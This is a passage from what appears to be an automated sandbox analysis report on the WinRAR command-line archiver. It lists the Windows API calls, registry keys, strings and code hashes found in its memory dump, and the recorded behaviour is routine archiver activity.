                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterPresentUnhandled__scrt_fastfail__scrt_is_nonwritable_in_current_image$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual__isa_available_init__scrt_acquire_startup_lock__scrt_initialize_crt__scrt_is_managed_app__scrt_release_startup_lock__scrt_uninitialize_crt__vcrt_initialize
                                                              • String ID:
                                                              • API String ID: 552178382-0
                                                              • Opcode ID: 9c665b31eb0b804363cbc587f94f2e5aa54598bfa8fc207139a92aecf1914098
                                                              • Instruction ID: 550618c8203608b9d62088f207d803e6a01c4381e66cecb2415813e4a25695b1
                                                              • Opcode Fuzzy Hash: 9c665b31eb0b804363cbc587f94f2e5aa54598bfa8fc207139a92aecf1914098
                                                              • Instruction Fuzzy Hash: A9313A25E0825B81FE14AF65AC613BF2391AFC7786F446039DB0D87293DE2CA404BA43

                                                              APIs
                                                              • RegOpenKeyExW.KERNELBASE(?,?,?,?,?,00007FF629B3495D,?,?,?,00007FF629B27E7D), ref: 00007FF629B347DB
                                                              • RegQueryValueExW.ADVAPI32(?,?,?,?,?,00007FF629B3495D,?,?,?,00007FF629B27E7D), ref: 00007FF629B34831
                                                              • ExpandEnvironmentStringsW.KERNEL32(?,?,?,?,?,00007FF629B3495D,?,?,?,00007FF629B27E7D), ref: 00007FF629B34853
                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,00007FF629B3495D,?,?,?,00007FF629B27E7D), ref: 00007FF629B348A6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: CloseEnvironmentExpandOpenQueryStringsValue
                                                              • String ID: LanguageFolder$Software\WinRAR\General
                                                              • API String ID: 1800380464-3408810217
                                                              • Opcode ID: df8e8945b6f074808e1d136ded68da0d597e77b5ffd7a0622e633ce0ea7293c4
                                                              • Instruction ID: 42c24c7243c440396f70a326605627deeab1340046850c1c771157b0a0a7997d
                                                              • Opcode Fuzzy Hash: df8e8945b6f074808e1d136ded68da0d597e77b5ffd7a0622e633ce0ea7293c4
                                                              • Instruction Fuzzy Hash: FF318F22B18A8A82EF50DF65EC142EF6351FFC6795F405231EE4D86B99EE6CD108DB01

                                                              Control-flow Graph

                                                              APIs
                                                              • RegOpenKeyExW.KERNELBASE(?,?,?,?,00000800,00000000,00000000,00007FF629B238CB,?,?,?,00007FF629B241EC), ref: 00007FF629B243D1
                                                              • RegQueryValueExW.ADVAPI32(?,?,?,?,00000800,00000000,00000000,00007FF629B238CB,?,?,?,00007FF629B241EC), ref: 00007FF629B24402
                                                              • RegCloseKey.ADVAPI32(?,?,?,?,00000800,00000000,00000000,00007FF629B238CB,?,?,?,00007FF629B241EC), ref: 00007FF629B2440D
                                                              • GetModuleFileNameW.KERNEL32(?,?,?,?,00000800,00000000,00000000,00007FF629B238CB,?,?,?,00007FF629B241EC), ref: 00007FF629B2443E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: CloseFileModuleNameOpenQueryValue
                                                              • String ID: AppData$Software\WinRAR\Paths
                                                              • API String ID: 3617018055-3415417297
                                                              • Opcode ID: 070cc4d0cc6b07d111a1af4e028d2b6750b797b38322b9f578af6c992b8e5665
                                                              • Instruction ID: 63719af3fa7ba5164a17af5c5646927db59b864b90a8391fb66a9e55821a62f4
                                                              • Opcode Fuzzy Hash: 070cc4d0cc6b07d111a1af4e028d2b6750b797b38322b9f578af6c992b8e5665
                                                              • Instruction Fuzzy Hash: 7C119022A1874A81EE109F22E8005AF7361FFCABC5F441135EA4E47A59DF3CE104E701

                                                              Control-flow Graph

                                                              Control-flow graph for the function at 7ff629af7a5b (rendered graph omitted; its basic blocks call only internal subroutines, no Windows API calls are recorded in the graph nodes)
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: H9
                                                              • API String ID: 0-2207570329
                                                              • Opcode ID: 479a09c780d4be94e5648284cf9069ca7028a91d6761c81901c4d854d78fe811
                                                              • Instruction ID: db68cf0092f5f993d8541a33a934194d491f230e24f3cb7ca196ea82e394cb5a
                                                              • Opcode Fuzzy Hash: 479a09c780d4be94e5648284cf9069ca7028a91d6761c81901c4d854d78fe811
                                                              • Instruction Fuzzy Hash: DCE1CD62A08B9685EF10DF25E848AFD33A9EB8678CF464035CE4D83785DF39E554E702

                                                              Control-flow Graph

                                                              Control-flow graph for the function at 7ff629b12574 (rendered graph omitted; its basic blocks call GetStdHandle, WriteFile, GetLastError and SetLastError)
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileLastWrite$Handle
                                                              • String ID:
                                                              • API String ID: 3350704910-0
                                                              • Opcode ID: ccd0c3e83433efd0ca407849e79df603d5f0c90f747e6cdc6739dd31fcb0c28b
                                                              • Instruction ID: 8be5f2f13f5ed4632f998a332eb22bf9303573ec44935bac522aece2ce0adbfe
                                                              • Opcode Fuzzy Hash: ccd0c3e83433efd0ca407849e79df603d5f0c90f747e6cdc6739dd31fcb0c28b
                                                              • Instruction Fuzzy Hash: 2E515326B0864687EE64DF26E85437F6360FBCBB86F440135DA4E87A90CF3CE545DA02

                                                              Control-flow Graph

                                                              Control-flow graph for the function at 7ff629b11e80 (rendered graph omitted; its basic blocks call CreateFileW, GetLastError and SetFileTime)
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: File$CreateErrorLast$Time
                                                              • String ID:
                                                              • API String ID: 1999340476-0
                                                              • Opcode ID: 892e3554a84f7d5f3af4d66201b4842f90aabb2a874f58c4d931fe245cb08f10
                                                              • Instruction ID: b3a3e73ceca4aafdf5562462dea549688ddc84b643d04d0871b6ebf573549a2b
                                                              • Opcode Fuzzy Hash: 892e3554a84f7d5f3af4d66201b4842f90aabb2a874f58c4d931fe245cb08f10
                                                              • Instruction Fuzzy Hash: 66411272A1868946FF608F25A8047AE6B90A787BB9F000338DE79866C4DF7CD4459B01

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: swprintf
                                                              • String ID: rar.ini$switches=$switches_%ls=
                                                              • API String ID: 233258989-2235180025
                                                              • Opcode ID: 7d70d85aa57c4b2adeedb5d1110c6c2e0691d0eb838de4c05f034f10faa9e0d3
                                                              • Instruction ID: 983430fdd9190cfc4e4024a64143ae32adc431a542eba9cc93e345827380f589
                                                              • Opcode Fuzzy Hash: 7d70d85aa57c4b2adeedb5d1110c6c2e0691d0eb838de4c05f034f10faa9e0d3
                                                              • Instruction Fuzzy Hash: 93419C22A1869A82EF10EF31D9511FE33A0EB867A5F400635EA5D87AD5EF3CE541E301

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmp
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: AddressHandleModuleProcsetbuf$ErrorLibraryLoadModeVersion
                                                              • String ID: rar.lng
                                                              • API String ID: 553376247-2410228151
                                                              • Opcode ID: da8370b5298aa504e96f4bedb37cf3b824543d1dd7ee1d37a7dea72557966179
                                                              • Instruction ID: d4ba7444327b855b6b2a430bda9e154c88c698ae8781e0f8830a8d3bc8c3ce5b
                                                              • Opcode Fuzzy Hash: da8370b5298aa504e96f4bedb37cf3b824543d1dd7ee1d37a7dea72557966179
                                                              • Instruction Fuzzy Hash: AF41AF21E0C28B42EF14AF219D512BF6391AFC7796F580138E90D8BAD7DE2DF405A716

                                                              Control-flow Graph

                                                              APIs
                                                              • SHGetMalloc.SHELL32(?,00000800,?,00007FF629B24432,?,?,?,?,00000800,00000000,00000000,00007FF629B238CB,?,?,?,00007FF629B241EC), ref: 00007FF629B240C4
                                                              • SHGetSpecialFolderLocation.SHELL32(?,?,?,?,00000800,00000000,00000000,00007FF629B238CB,?,?,?,00007FF629B241EC), ref: 00007FF629B240DF
                                                              • SHGetPathFromIDListW.SHELL32 ref: 00007FF629B240F1
                                                                • Part of subcall function 00007FF629B13458: CreateDirectoryW.KERNEL32(00000800,00000000,?,00007FF629B2413F,?,?,?,?,00000800,00000000,00000000,00007FF629B238CB,?,?,?,00007FF629B241EC), ref: 00007FF629B134A0
                                                                • Part of subcall function 00007FF629B13458: CreateDirectoryW.KERNEL32(00000800,00000000,?,00007FF629B2413F,?,?,?,?,00000800,00000000,00000000,00007FF629B238CB,?,?,?,00007FF629B241EC), ref: 00007FF629B134D5
Memory Dump Source
• Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
• Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
Similarity
• API ID: CreateDirectory$FolderFromListLocationMallocPathSpecial
• String ID: WinRAR
• API String ID: 977838571-3970807970
• Opcode ID: 415bfa020dc0990cad3e0501dba2d99d0bb0d0c3ec71343b5049903f98ccb042
• Instruction ID: 4a2476f3edbd5e4da011ea4a7f6e1195c92201e44a33cfef10fc6e168544f6da
• Opcode Fuzzy Hash: 415bfa020dc0990cad3e0501dba2d99d0bb0d0c3ec71343b5049903f98ccb042
• Instruction Fuzzy Hash: 89215B26A0CA4680EE509F23AC501BF6761EFDABD2B095035DF0E87B59DE3CE444D601

APIs
• GetEnvironmentStringsW.KERNELBASE(?,?,?,?,?,?,?,00007FF629B53CEF,?,?,00000000,00007FF629B53CAA,?,?,00000000,00007FF629B53FD9), ref: 00007FF629B597A5
• WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF629B53CEF,?,?,00000000,00007FF629B53CAA,?,?,00000000,00007FF629B53FD9), ref: 00007FF629B59807
• WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF629B53CEF,?,?,00000000,00007FF629B53CAA,?,?,00000000,00007FF629B53FD9), ref: 00007FF629B59841
• FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF629B53CEF,?,?,00000000,00007FF629B53CAA,?,?,00000000,00007FF629B53FD9), ref: 00007FF629B5986B
Memory Dump Source
• Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
• Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
Similarity
• API ID: ByteCharEnvironmentMultiStringsWide$Free
• String ID:
• API String ID: 1557788787-0
• Opcode ID: 364642b671081880708a9fd88c74d382691b826692dc9b7a9f4ea86390b8b8db
• Instruction ID: 68557fd4fae87edc4e3e302ff94d807cfeed876871e5c2dcc6c9ddee8daf2d22
• Opcode Fuzzy Hash: 364642b671081880708a9fd88c74d382691b826692dc9b7a9f4ea86390b8b8db
• Instruction Fuzzy Hash: C3218421E0875981EE208F13E84012F66A4FF99FD1F484135DE9EA3BA4DF7CE4529305
Memory Dump Source
• Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
• Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
Similarity
• API ID: ErrorLast$FileHandleRead
• String ID:
• API String ID: 2244327787-0
• Opcode ID: 292f130439141af7737bd2c92edf84b453f5fe027529f60c064a2129a7dd684d
• Instruction ID: 2f30579027004dde9903166ca25398b4b3f21c2c14d40635bd93b1402b6622ad
• Opcode Fuzzy Hash: 292f130439141af7737bd2c92edf84b453f5fe027529f60c064a2129a7dd684d
• Instruction Fuzzy Hash: 77216021E0854E81EE608F26E84037F66A4BFC7B96F104535EA59CB6D4CE2DE851E743
Memory Dump Source
• Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
• Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
Similarity
• API ID:
• String ID: AFUM$default.sfx
• API String ID: 0-2491287583
• Opcode ID: 9c5250dc79f526f8b88a1db49316f6b7f6f5dd8f7a69fa39e4eeb80febe8b362
• Instruction ID: 9e9f941292c11942c7cf8c80a2863a9078216c847960b527f420f4da08718e95
• Opcode Fuzzy Hash: 9c5250dc79f526f8b88a1db49316f6b7f6f5dd8f7a69fa39e4eeb80febe8b362
• Instruction Fuzzy Hash: E681C921E0C68A40EF709F119A442BF3292AFD3786F448031DE8D876C5EF7DA495E752
Memory Dump Source
• Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
• Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
Similarity
• API ID: FileHandleType
• String ID: @
• API String ID: 3000768030-2766056989
• Opcode ID: ac2df8724446a0d51fe7f393cd596ff3ce055ba98acd5cb21c7dcdd1beef0449
• Instruction ID: 912258168f83d58645b9493bcd83069eadf69e0cab35585eeaf88cc171662406
• Opcode Fuzzy Hash: ac2df8724446a0d51fe7f393cd596ff3ce055ba98acd5cb21c7dcdd1beef0449
• Instruction Fuzzy Hash: A6218422A1874A81EF748F35DC9017E2655EBD6775F281335DA6E867D4CE38E881E302
Memory Dump Source
• Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
• Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
Similarity
• API ID: Threadwcschr$CreateExceptionPriorityThrow
• String ID: CreateThread failed
• API String ID: 1217111108-3849766595
• Opcode ID: 23f25dd9d767684a47335cfb6564c8d2137849cd663ca384977e916ef4a87e16
• Instruction ID: 8dfa1df89be3d21a781067bca438e8cae5dc86f4a335ef8f96daacaac391a58d
• Opcode Fuzzy Hash: 23f25dd9d767684a47335cfb6564c8d2137849cd663ca384977e916ef4a87e16
• Instruction Fuzzy Hash: FB116031918A4A82EF04EF21EC401BF7360FBC6786F544136D68D82669DF3CE546D745
Memory Dump Source
• Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
